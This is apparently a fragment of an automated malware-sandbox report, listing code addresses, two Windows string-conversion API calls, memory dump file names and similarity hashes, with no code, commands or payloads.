                    0x013ff473
                    0x013ff396
                    0x013ff39c
                    0x013ff3c9
                    0x013ff3d5
                    0x013ff3db
                    0x013ff3dd
                    0x00000000
                    0x00000000
                    0x013ff3e3
                    0x013ff3e9
                    0x013ff3ec
                    0x013ff448
                    0x013ff44d
                    0x013ff455
                    0x00000000
                    0x013ff455
                    0x013ff3ee
                    0x013ff3f1
                    0x013ff3f3
                    0x013ff3f6
                    0x013ff3f8
                    0x013ff3fa
                    0x013ff430
                    0x013ff43e
                    0x013ff444
                    0x013ff446
                    0x013ff45a
                    0x00000000
                    0x013ff45a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff3fc
                    0x013ff3fc
                    0x013ff3fc
                    0x013ff3ff
                    0x013ff402
                    0x013ff404
                    0x00000000
                    0x00000000
                    0x013ff40e
                    0x013ff415
                    0x013ff418
                    0x013ff41a
                    0x013ff422
                    0x013ff422
                    0x013ff425
                    0x013ff426
                    0x013ff429
                    0x013ff42b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff42b
                    0x013ff41c
                    0x013ff41d
                    0x013ff420
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff420
                    0x013ff42d
                    0x00000000
                    0x013ff42d
                    0x013ff39e
                    0x013ff3a0
                    0x00000000
                    0x00000000
                    0x013ff3a6
                    0x013ff3a9
                    0x013ff3ad
                    0x013ff3b0
                    0x013ff3b4
                    0x00000000
                    0x00000000
                    0x013ff3ba
                    0x013ff3bb
                    0x013ff3be
                    0x013ff3c0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff3c2
                    0x00000000
                    0x013ff3a9
                    0x013ff36d
                    0x00000000
                    0x013ff378
                    0x013ff35a
                    0x013ff360
                    0x00000000
                    0x013ff360
                    0x013ff4b7

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,013C6AF3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,013C6AF3,00000000), ref: 013FF3D5
                    • GetLastError.KERNEL32 ref: 013FF3E3
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,013C6AF3,00000000), ref: 013FF43E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 1703ae6350e2829ec729c9855b425a9051d0fc43508870ed99aaf08923e7f1f9
                    • Instruction ID: a167463bec7a73469bc962b1df0a2ba99704d0d6d3c2be2171d34386b4ea0f2a
                    • Opcode Fuzzy Hash: 1703ae6350e2829ec729c9855b425a9051d0fc43508870ed99aaf08923e7f1f9
                    • Instruction Fuzzy Hash: 5741C332604256AFDB329F6CC844ABA7BADEF01328F15416DEF59A72E5DB318901C760
                    Uniqueness

                    Uniqueness Score: -1.00%